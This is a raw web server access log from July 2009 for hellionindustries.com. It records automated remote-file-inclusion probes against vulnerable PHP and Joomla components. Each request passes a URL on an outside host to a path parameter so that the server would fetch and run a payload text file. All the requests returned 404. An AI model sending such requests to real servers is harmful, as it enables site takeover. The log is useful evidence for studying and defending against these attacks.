64.191.102.117 - - [04/Jul/2009:18:40:42 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:40:42 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:40:43 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:40:43 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:40:43 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:40:48 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:40:48 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:40:48 -0700] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:18:40:49 -0700] "GET /logs/access.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:18:40:49 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:18:40:49 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:18:40:49 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:18:40:49 -0700] "GET /logs/access.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:18:40:49 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:40:53 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:40:53 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:40:53 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:40:56 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:40:56 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:40:57 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:40:57 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:40:57 -0700] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:40:59 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:40:59 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:40:59 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:41:00 -0700] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:41:01 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:41:01 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:41:05 -0700] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:42:12 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:42:12 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:42:12 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:42:24 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:42:24 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:42:24 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:43:10 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:43:10 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:43:10 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:43:31 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:43:31 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:43:31 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:43:58 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:43:58 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:43:58 -0700] "GET /logs/scripts.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:44:06 -0700] "GET /logs/scripts.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:44:06 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:44:06 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:44:07 -0700] "GET /logs/scripts.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:44:07 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:44:07 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:44:24 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:44:24 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:44:24 -0700] "GET /logs/scripts.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:44:57 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:44:57 -0700] "GET /logs/scripts.log//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
64.191.102.117 - - [04/Jul/2009:18:44:57 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:18:46:01 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
211.230.156.161 - - [04/Jul/2009:18:46:01 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
82.151.132.176 - - [04/Jul/2009:18:57:57 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
82.151.132.176 - - [04/Jul/2009:18:57:57 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
82.151.132.176 - - [04/Jul/2009:18:57:57 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
82.151.132.176 - - [04/Jul/2009:18:59:31 -0700] "GET /logs/access.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:19:01:10 -0700] "GET /logs/access.log/components/com_smf/smf.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:19:01:10 -0700] "GET /logs/components/com_smf/smf.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:19:01:10 -0700] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:19:01:15 -0700] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:19:01:19 -0700] "GET /logs/access.log/components/com_smf/smf.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:19:01:19 -0700] "GET /logs/components/com_smf/smf.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:09:24 -0700] "GET /index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:09:25 -0700] "GET /index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:09:25 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:09:25 -0700] "GET /logs/access_090212.log/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:09:25 -0700] "GET /logs/access_090212.log/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
195.34.78.110 - - [04/Jul/2009:19:09:25 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
201.232.54.48 - - [04/Jul/2009:19:10:33 -0700] "GET /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
201.232.54.48 - - [04/Jul/2009:19:10:33 -0700] "GET /logs/access.log%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
201.232.54.48 - - [04/Jul/2009:19:10:36 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
201.232.54.48 - - [04/Jul/2009:19:12:19 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
201.232.54.48 - - [04/Jul/2009:19:12:19 -0700] "GET /logs/access.log%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
201.232.54.48 - - [04/Jul/2009:19:12:19 -0700] "GET /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
77.221.130.19 - - [04/Jul/2009:19:12:51 -0700] "GET /logs//standard//3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mattmock.com/googlehosted/man?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
77.221.130.19 - - [04/Jul/2009:19:12:51 -0700] "GET /standard//3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mattmock.com/googlehosted/man?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:15:35 -0700] "GET /logs/access_090212.log/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:15:35 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:15:35 -0700] "GET /index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:16:22 -0700] "GET /logs/access_090212.log/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:16:22 -0700] "GET /index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:16:22 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
201.232.54.48 - - [04/Jul/2009:19:21:33 -0700] "GET /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
201.232.54.48 - - [04/Jul/2009:19:21:36 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:26:13 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:26:13 -0700] "GET /index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:26:18 -0700] "GET /logs/access_090212.log/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:19:28:03 -0700] "GET /mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:19:28:03 -0700] "GET /logs/access.log/mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:19:28:03 -0700] "GET /logs/mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:19:28:29 -0700] "GET /logs/access.log/index.php?absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:19:28:29 -0700] "GET /logs/index.php?absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:19:28:30 -0700] "GET /index.php?absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:19:28:57 -0700] "GET /logs/access.log/index.php?absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:19:28:57 -0700] "GET /logs/index.php?absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:19:28:57 -0700] "GET /index.php?absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:19:28:59 -0700] "GET /logs/mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:19:28:59 -0700] "GET /logs/access.log/mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:19:28:59 -0700] "GET /mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:29:08 -0700] "GET /index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:29:08 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
83.98.209.71 - - [04/Jul/2009:19:29:09 -0700] "GET /logs/access_090212.log/index.php?option=com_custompages&cpage=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:19:32:43 -0700] "GET /logs/access.log%20%20/index.php?absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:19:32:45 -0700] "GET /logs/access.log%20%20/mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.147.206 - - [04/Jul/2009:19:32:46 -0700] "GET /logs/access.log%20%20/index.php?absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:19:33:01 -0700] "GET /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:19:33:01 -0700] "GET /logs/access.log%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
70.85.213.106 - - [04/Jul/2009:19:33:05 -0700] "GET /logs/access.log%20%20/mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:19:33:06 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:19:33:10 -0700] "GET /allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:19:33:10 -0700] "GET /logs/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:19:33:10 -0700] "GET /logs/access.log%20%20/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:19:34:21 -0700] "GET /logs/access.log/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:19:34:21 -0700] "GET /logs/allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
88.191.37.60 - - [04/Jul/2009:19:34:21 -0700] "GET /allopass-error.php?mosConfig_live_site=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
